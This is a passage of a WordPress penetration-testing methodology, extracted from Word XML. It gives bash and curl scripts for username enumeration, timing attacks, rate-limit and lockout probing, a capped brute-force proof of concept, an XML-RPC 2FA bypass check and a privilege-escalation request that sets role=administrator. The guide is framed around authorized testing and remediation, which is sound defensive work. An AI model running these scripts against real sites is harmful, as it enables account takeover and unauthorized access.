-q "password you entered" /tmp/login_test.html;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"[+] User EXISTS: $username (password incorrect message)"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elif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grep -q "Invalid username or password" /tmp/login_test.html;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"[?] Generic error for: $username (enumeration may be prevented)"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else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"[?] Unknown response for: $username"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}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Test known users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test_user "admin"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test_user "nonexistentuser12345"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test_user "test"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**Timing-Based Enumeration (Advanced):**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Sometimes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valid users take slightly longer to process (password hash verification)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This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is unreliable but worth documenting if consistent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user in admin test demo invalid12345; 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start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=$(date +%s%N)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-X POST https://target.com/wp-login.php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-d "log=$user&amp;pwd=wrong" -o /dev/null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end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=$(date +%s%N)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elapsed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=$((($end - $start) / 1000000))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"User: $user | Time: ${elapsed}ms"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| tee evidence/timing_enum.txt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Analyze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results - consistent timing difference might indicate valid user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904EF6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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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  <w:r w:rsidRPr="00904EF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### 5.6 Confirming Enumeration Results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**Cross-Validation Process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Create master user list from all methods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cat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evidence/rest_api_users_extracted.txt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evidence/author_id_enumeration.txt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evidence/xmlrpc_valid_users.txt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|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grep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-oP '\w+' | sort -u &gt; evidence/all_enumerated_users.txt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Verify each user via multiple methods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while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read user; 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"Verifying: $user"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# REST API check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rest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=$(curl -s "https://target.com/wp-json/wp/v2/users" | jq -r ".[].slug" | grep -x "$user")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# Author page check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  author_code=$(curl -s -o /dev/null -w "%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{http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_code}" "https://target.com/author/$user/")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# XML-RPC check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xmlrpc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=$(curl -s -X POST https://target.com/xmlrpc.php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-H "Content-Type: text/xml"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-d "&lt;?xml version=\"1.0\"?&gt;&lt;methodCall&gt;&lt;methodName&gt;wp.getUsersBlogs&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;$user&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;string&gt;wrong&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;" |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grep -q "Incorrect username or password" &amp;&amp; echo "confirmed" || echo "")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# Tally confirmations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confirms=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0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[ ! -z "$rest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 ]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&amp;&amp; ((confirms++)) &amp;&amp; methods="REST"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[ "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$author_code" == "200" ] &amp;&amp; ((confirms++)) &amp;&amp; methods="$methods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,AUTHOR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[ "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$xmlrpc" == "confirmed" ] &amp;&amp; ((confirms++)) &amp;&amp; methods="$methods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,XMLRPC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$confirms -ge 2 ];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"[CONFIRMED] $user (verified by: $methods)"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elif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$confirms -eq 1 ];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"[PROBABLE] $user (verified by: $methods)"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else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"[UNCONFIRMED] $user"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&lt; evidence/all_enumerated_users.txt | tee evidence/verified_users.txt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904EF6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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00904EF6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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904EF6">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">### 5.7 Evidence </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00904EF6">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00904EF6">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> for User Enumeration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**Screenshot Requirements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1. REST API response showing user list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2. Author page for at least one user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3. XML-RPC response demonstrating enumeration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4. Final verified user list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**Documentation Template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````markdown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## Finding: User Enumeration via Multiple Vectors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### Affected Components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WordPress REST API (/wp-json/wp/v2/users)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- Author Archives (/author/USERNAME/)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XML-RPC (xmlrpc.php - wp.getUsersBlogs method)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### Enumerated Users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Total: X users confirmed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| Username | User ID | Role (if disclosed) | Source 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|----------|---------|---------------------|---------|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|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admin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| 1 | Administrator (inferred) | REST API, Author, XML-RPC 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|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john-doe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| 2 | Contributor | REST API, Author |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00C0369D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C0369D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| ... | ... | ... | ... |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00C0369D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### Proof of Concept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**REST API Enumeration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```http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GET /wp-json/wp/v2/users HTTP/1.1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Host: target.com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HTTP/1.1 200 OK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Content-Type: application/json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[{"id":1,"name":"Administrator","slug":"admin"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,...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}]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**Impact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Attacker can build targeted user list for brute-force attacks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Reduces brute-force search space by ~90% (no longer guessing usernames)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Enables targeted phishing/social engineering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Combined with weak password policy: HIGH severity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**Severity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 MEDIUM (standalone), HIGH (if weak passwords detected)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**Recommendation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1. Disable user enumeration via REST API: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- Install security plugin (Wordfence, iThemes Security)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- Or add to functions.php: [code snippet]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2. Remove author archives if not needed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3. Disable XML-RPC if not required</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="002A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4. Implement strong password policy and 2FA</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00D82576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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00D82576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  <w:r w:rsidRPr="00D8257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## 6. AUTHENTICATION &amp; AUTHORIZATION TESTING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D82576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2"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D82576">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>### 6.1 Brute-Force Detection &amp; Controlled Exploitation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**Understanding the Balance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You need to PROVE vulnerability without causing harm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- 10-20 attempts is enough to demonstrate lack of rate limiting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Use throwaway credentials for PoC (never exfiltrate real passwords)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**Phase 1: Baseline Assessment**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Test 1: Single failed login attempt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 -X POST https://target.com/wp-login.php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"log=admin&amp;pwd=wrongpassword1&amp;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wp-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submit=Log+In"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-c cookies.txt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-L -o evidence/login_attempt_01.html 2&gt;&amp;1 | tee evidence/login_attempt_01_headers.txt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Document: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Response time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Any rate limiting headers (X-RateLimit-*, Retry-After)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Error message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HTTP status code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**Test 2: Detect Rate Limiting**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#!/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bin/bash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rate_limit_test.sh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URL="https://target.com/wp-login.php"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USER="admin"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"Testing rate limiting with 20 attempts..."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 in {1..20}; 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start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=$(date +%s%N)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response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=$(curl -s -X POST $URL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-d "log=$USER&amp;pwd=testpass$i&amp;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wp-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submit=Log+In"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-L -w "%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{http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_code}" -o /tmp/login_$i.html)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end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=$(date +%s%N)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elapsed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=$((($end - $start) / 1000000))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"Attempt $i: HTTP $response | Time: ${elapsed}ms"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# Check for lockout or rate limiting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grep -q "locked" /tmp/login_$i.html;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  [!] Account appears LOCKED after $i attempts"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break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grep -q "too many" /tmp/login_$i.html;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  [!] Rate limiting detected after $i attempts"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break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$i -eq 20 ];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  [!] NO rate limiting detected after 20 attempts"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sleep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0.5  # Small delay between attempts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| tee evidence/rate_limit_test.txt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**Test 3: IP-Based vs Cookie-Based Rate Limiting**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Test if rate limiting is IP-based (can be bypassed with proxies)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vs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cookie/session-based (more robust)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First round: Normal requests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 in {1..5}; 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-X POST https://target.com/wp-login.php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-d "log=admin&amp;pwd=test$i" -o /dev/null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"Request $i sent"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Second round: Clear cookies between requests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 in {6..10}; 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-X POST https://target.com/wp-login.php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    -d "log=admin&amp;pwd=test$i" -c /tmp/cookies_$i.txt -o /dev/null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rm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/tmp/cookies_$i.txt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"Request $i sent (fresh cookies)"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If second round continues to work without lockout, rate limiting is cookie-based (weaker)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**Phase 2: Controlled Brute-Force PoC**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#!/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bin/bash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bruteforce_poc.sh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IMPORTANT: Use ONLY for PoC, max 10 passwords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URL="https://target.com/wp-login.php"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="00D82576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USER="admin" </w:t>
      </w:r>
      <w:r w:rsidR="001B03AE"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Enumerate user first (see Section 5)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Create a SHORT password list for demonstration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cat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&gt; poc_passwords.txt &lt;&lt; 'EOF'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password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admin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test123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welcome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letmein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EOF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"=== Brute-Force PoC ==="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"Target: $URL"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"User: $USER"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"Passwords to test: $(wc -l &lt; poc_passwords.txt)"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attempt=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0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while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read password; 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((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attempt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++))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-n "[$attempt] Testing: $password ... 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response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=$(curl -s -X POST $URL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-d "log=$USER&amp;pwd=$password&amp;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wp-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submit=Log+In"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-L -o /tmp/bf_attempt.html)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# Check for successful login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grep -q "Dashboard" /tmp/bf_attempt.html ||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grep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-q "wp-admin" /tmp/bf_attempt.html;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"SUCCESS!"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"[!] CRITICAL: Password found - $password"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"[!] This is a PoC finding, do NOT exfiltrate or use further"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/tmp/bf_attempt.html evidence/successful_login.html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break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else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"Failed"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sleep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1  # Respectful delay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&lt; poc_passwords.txt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"PoC complete. Attempted $attempt passwords."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rm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poc_passwords.txt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D82576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  <w:r w:rsidRPr="00D8257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**CRITICAL: What to Do if You Find a Password</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D8257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:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D82576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*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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IMMEDIATELY STOP testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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 xml:space="preserve">Document the finding: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Number of attempts before success</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Time taken</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Evidence of lack of rate limiting</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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 xml:space="preserve">DO NOT: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Log into the admin panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Exfiltrate the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Continue testing with valid credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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NOTIFY the client immediately (per RoE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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In the report, state: "Password identified after X attempts within Y seconds. Password value NOT included in report for security. Client has been notified separately via secure channel."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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6"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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6"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>### 6.2 Rate Limiting Bypass Attempts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**Technique 1: User-Agent Rotation**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Test if rate limiting is User-Agent based (rare but possible)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 in {1..5}; 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ua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="Mozilla/5.0 (TestBot $i)"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-X POST https://target.com/wp-login.php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-H "User-Agent: $ua"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-d "log=admin&amp;pwd=test$i" -o /dev/null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"Request $i with UA: $ua"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**Technique 2: Proxy/VPN Rotation (Conceptual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NOTE: Only document the technique, don't actually proxy unless explicitly authorized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Many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environments consider proxy use as out-of-scope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Concept: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rate limiting is IP-based, attacker could use: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Tor network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Proxy rotation services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Cloud instances with different IPs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report, state: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"Rate limiting is IP-based. Attacker could bypass using distributed attack from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 multiple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IP addresses. Recommend implementing cookie/session-based rate limiting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 in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addition to IP-based controls."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**Technique 3: Credential Stuffing Detection**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Test if system detects multiple usernames vs one username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Credential stuffing: Attacker tries user1:pass1, user2:pass2, user3:pass3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vs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Brute-force: Attacker tries user1:pass1, user1:pass2, user1:pass3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"Testing credential stuffing vs brute-force detection..."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Brute-force (same user, different passwords)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 in {1..5}; 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-X POST https://target.com/wp-login.php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-d "log=admin&amp;pwd=password$i" -o /tmp/bf_$i.html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sleep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1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# Credential stuffing (different users, different passwords)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user in admin test demo user1 user2; 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-X POST https://target.com/wp-login.php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-d "log=$user&amp;pwd=password123" -o /tmp/cs_$user.html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sleep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1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Check if second method triggers lockout faster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"Check /tmp/bf_*.html and /tmp/cs_*.html for differences"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A440EF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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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  <w:r w:rsidRPr="00A440EF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### 6.3 Lockout Mechanisms Assessment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**Test Lockout Behavior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#!/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bin/bash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lockout_test.sh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URL="https://target.com/wp-login.php"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USER="testuser_pentest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  #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Use a test account if possible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"=== Lockout Mechanism Test ==="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 in {1..30}; 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-n "Attempt $i: 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response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=$(curl -s -X POST $URL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-d "log=$USER&amp;pwd=wrongpass$i"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-L -o /tmp/lockout_$i.html)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# Check for various lockout indicators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grep -qi "locked\|blocked\|banned\|temporarily disabled" /tmp/lockout_$i.html;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"LOCKED"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"[*] Account locked after $i failed attempts"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lockout_attempt=$i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Save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lockout page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/tmp/lockout_$i.html evidence/lockout_page.html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    # Test lockout duration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"[*] Testing lockout duration..."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wait in 60 120 300 600; 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  Waiting $wait seconds..."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sleep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$wait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unlock_test=$(curl -s -X POST $URL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-d "log=$USER&amp;pwd=wrongpass"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-L -o /tmp/unlock_test_$wait.html)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 !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grep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-qi "locked\|blocked" /tmp/unlock_test_$wait.html;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  [+] Account unlocked after $wait seconds"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lockout_duration=$wait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break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break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else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"Not locked"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sleep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2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"=== Results ==="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"Lockout triggered after: ${lockout_attempt:-N/A (not triggered)} attempts"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"Lockout duration: ${lockout_duration:-N/A} seconds"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**Document Lockout Findings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````markdown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## Lockout Mechanism Analysis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| Parameter | Value | Assessment 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|-----------|-------|------------|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| Lockout threshold | 5 attempts | Adequate (OWASP recommends 3-5) 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| Lockout duration | 300 seconds (5 min) | Good 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| Reset mechanism | Time-based | Acceptable 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| Account recovery | Email link | Standard |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**Potential Weaknesses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[ ] No CAPTCHA after X attempts (allows automated attacks)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[ ] Lockout is IP-based only (bypassable via proxy)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[ ] Error messages disclose account existence during lockout</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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</w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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  <w:r w:rsidRPr="00A440EF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### 6.4 Two-Factor Authentication Detection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**Detect 2FA Implementation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Test with a KNOWN valid username (from enumeration)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 -X POST https://target.com/wp-login.php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"log=admin&amp;pwd=INTENTIONALLY_WRONG"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-L -o evidence/2fa_detection.html 2&gt;&amp;1 | tee evidence/2fa_headers.txt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Look for 2FA indicators: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JavaScript loading for 2FA plugins (Wordfence, Google Authenticator)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Redirect to 2FA page even with wrong password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Specific headers or cookies indicating 2FA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**Common 2FA Plugins to Detect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Check for 2FA plugin assets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plugin in "wordfence" "google-authenticator" "two-factor" "duo-wordpress"; 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code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=$(curl -s -o /dev/null -w "%{http_code}"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"https://target.com/wp-content/plugins/$plugin/")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"$code" == "200" ] || [ "$code" == "403" ];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"[+] Possible 2FA plugin: $plugin"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**2FA Bypass Testing (Advanced - Only with Explicit Permission):**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Common 2FA bypass techniques to TEST (not exploit):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1.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Check if 2FA is enforced for ALL users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   (Sometimes only enforced for admins, not editors/authors)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2.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Test if 2FA can be bypassed via XML-RPC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-X POST https://target.com/xmlrpc.php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-H "Content-Type: text/xml"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'&lt;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?xml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version="1.0"?&gt;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methodCall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methodName&gt;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wp.getUsersBlogs&lt;/metho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dName</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>&gt; &lt;params&gt; &lt;param&gt;&lt;value&gt;&lt;string&gt;VALID_USER&lt;/string&gt;&lt;/value&gt;&lt;/param&gt; &lt;param&gt;&lt;value&gt;&lt;string&gt;VALID_PASSWORD&lt;/string&gt;&lt;/value&gt;&lt;/param&gt; &lt;/params&gt; &lt;/methodCall&gt;'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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Cs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>If this succeeds without 2FA challenge, it's a bypass (HIGH severity)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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Cs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3. Test if 2FA can be bypassed via REST API authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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Cs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4. Test if backup codes are generated securely</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF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Cs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Test if 2FA setup can be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>skipped/cancelled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A440EF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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF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### 6.5 Role-Based Access Control (RBAC) Issues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A440EF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2"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>**Understanding WordPress Roles</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF" w:rsidRDefault="001B03AE" w:rsidP="00A440EF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A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Subscriber &lt; Contributor &lt; Author &lt; Editor &lt; Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A440EF" w:rsidRPr="00A440EF" w:rsidRDefault="001B03AE" w:rsidP="00A440EF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A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Subscriber: Read-only </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A440EF" w:rsidRPr="00A440EF" w:rsidRDefault="001B03AE" w:rsidP="00A440EF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A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Contributor: Can write posts, can't publish </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A440EF" w:rsidRPr="00A440EF" w:rsidRDefault="001B03AE" w:rsidP="00A440EF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A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Author: Can publish own posts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A440EF" w:rsidRPr="00A440EF" w:rsidRDefault="001B03AE" w:rsidP="00A440EF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A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Editor: Can publish/edit all posts </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A440EF" w:rsidRDefault="001B03AE" w:rsidP="00A440EF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A440EF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Administrator: Full control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A440EF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2"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>**Testing RBAC (Requires Access):**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**Pre-Requisite:** You need credentials for at least one low-privilege account. Options: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1. Register a new account if registration is enabled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2. Use provided test credentials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3. Create a test account via exploitation (e.g., plugin vulnerability)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Test 1: Check if low-privilege user can access admin functions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Authenticate as Contributor/Author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 -X POST https://target.com/wp-login.php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"log=author_user&amp;pwd=author_password"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  -c author_cookies.txt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-L -o /dev/null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Try to access admin-only pages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-b author_cookies.txt https://target.com/wp-admin/plugins.php -o evidence/rbac_plugins_access.html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-b author_cookies.txt https://target.com/wp-admin/users.php -o evidence/rbac_users_access.html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-b author_cookies.txt https://target.com/wp-admin/options-general.php -o evidence/rbac_settings_access.html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Expected: Redirect to wp-admin/index.php or "You do not have permission" message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Finding: If 200 OK with actual content, privilege escalation vulnerability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**Horizontal Privilege Escalation Testing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Scenario: Can User A modify User B's content (same role level)?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1.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Create/identify two Author-level users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2.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User A creates a post (note the post_id)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3.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Authenticate as User B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4.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Try to edit User A's post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Example POST request (use Burp Suite for actual testing):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POST /wp-admin/post.php HTTP/1.1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Host: target.com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Cookie: wordpress_logged_in_xxx=USER_B_COOKIE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action=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edit&amp;post_id=123  # User A's post ID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Expected: Permission denied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Finding: If User B can edit, it's horizontal privilege escalation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**Vertical Privilege Escalation Testing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Scenario: Can Contributor escalate to Administrator?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Common attack vectors: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1.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CSRF on user role change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2.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Insecure Direct Object Reference (IDOR) on user update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# 3.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Plugin vulnerability allowing role modification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Example test: Try to change own role via crafted request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This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requires intercepting with Burp Suite and modifying parameters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Legitimate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user update request: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POST /wp-admin/profile.php HTTP/1.1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...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user_email=user@example.com&amp;role=contributor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Attempt role modification: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POST /wp-admin/profile.php HTTP/1.1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...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user_email=user@example.com&amp;role=administrator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Expected: Parameter ignored or error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Finding: If role changes, critical privilege escalation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A440EF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u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A440EF">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:b/>
          <w:color w:val="383A42"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>### 6.6 Session Management Testing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**Cookie Security Assessment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Capture cookies after authentication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-v -X POST https://target.com/wp-login.php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"log=testuser&amp;pwd=testpassword"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-c cookies.txt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-L -o /dev/null 2&gt;&amp;1 | grep -i "set-cookie"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Analyze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cookies for security attributes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cat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cookies.txt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Check for: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HttpOnly flag (prevents JavaScript access)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Secure flag (HTTPS only)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SameSite attribute (CSRF protection)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**Cookie Security Checklist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lastRenderedPageBreak/>
        <w:t>wordpress</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>hash] cookie: □ HttpOnly: YES/NO □ Secure: YES/NO □ SameSite: None/Lax/Strict □ Expires: Session/Long-term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wordpress_logged_in</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
